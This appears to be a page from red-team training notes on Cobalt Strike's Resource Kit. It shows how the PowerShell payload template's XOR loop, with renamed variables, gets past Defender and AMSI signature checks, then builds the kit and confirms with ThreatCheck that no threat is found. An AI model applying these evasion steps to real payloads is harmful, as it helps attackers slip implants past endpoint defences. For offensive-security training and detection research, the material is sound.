Resource Kit
The Resource Kit can be found in C:\Tools\cobaltstrike\arsenal-kit\kits\resource
. The portion of the ThreatCheck output that we want to pay attention to is the for
loop.
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
\
The 64-bit stageless PowerShell payload is taken from template.x64.ps1
. Interestingly, if we open it in Visual Studio Code, we see the following on lines 26-28:
for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
$v_code[$zz] = $v_code[$zz] -bxor 35
}
\
HelpSystems have already provided a template with different variable names - $zz
in place of $x
and $v_code
in place of $var_code
. This will bypass Defender as it is, so we don't actually need to modify it. As before, use the included build script and specify an output directory, then load resources.cna
into Cobalt Strike.
./build.sh /mnt/c/Tools/cobaltstrike/resources
[Resource Kit] [+] Copy the resource files
[Resource Kit] [+] Generate the resources.cna from the template file.
[Resource Kit] [+] The resource kit files are saved in '/mnt/c/Tools/cobaltstrike/resources'
\
Regenerate your payloads for the final time.
PS C:\Users\Attacker> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
[+] No threat found!
[*] Run time: 0.34s
Last updated